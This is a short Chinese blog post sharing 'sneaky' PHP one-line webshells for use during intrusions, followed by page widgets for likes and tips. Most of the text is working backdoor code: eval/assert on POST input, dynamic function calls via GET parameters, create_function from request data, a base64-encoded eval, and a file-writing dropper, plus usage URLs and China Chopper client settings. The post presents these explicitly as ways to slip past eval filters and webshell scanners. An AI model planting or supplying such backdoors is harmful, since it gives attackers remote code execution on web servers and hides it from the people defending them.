php一句话猥琐流搞法

在渗透中常常遇到拦截eval的,所以
<?php eval($_POST[xiao])?>这种形式的会被拦截
常见的是变成
base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)
这种形式可以绕过,另外还有其他形式
 
<?php $_GET['eval']($_POST['xiao']);?>
 
 
 
今天见一比较怪的东西:web 杀毒 。v1.0。点。心想是不是谁有跟云扯上了。
 
完了才知道是个webshell扫描工具。各位前辈把web后门弄的死去活来的,揍是怕人发现,压缩, 加密 ,字符逆转,一句话,很烂了。
 
前段时间cnqing的blog上也发了一个:
 
不少人讨论了,也有人跟我的感觉一样,php的后门不好杜绝。其实关键在于规则。再主动的扫描也是按照既定的规则进行的。
 
我也发一个,属于猥琐流的。
 
if(key($_GET)=='singyea')call_user_func($_GET['singyea'],$_POST['singyea']);
 
好了。使用方法:
 
http://www.2cto.com /shell.php?singyea=assert
 
客户端用菜刀
 
<?php $_GET['a']($_POST['b']);?>
test.php?a=assert
密码b
 
<?php assert($_POST[s]);?>
 
<?php $_POST['iso']($_POST['cmd']);?>
 
密码cmd 菜刀配置信息填:<O>iso=assert</O>
 
<?php
$s = create_function('', $_REQUEST['c']);
$s();
// s.php?c=eval%28$_REQUEST[cmd]%29;&cmd=echo%201;
?>
 
<?php file_put_contents(base64_decode(文件名), base64_decode( 小马 base64));?>
 
不解释上图



作者 rootc4 Free sharing小组
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值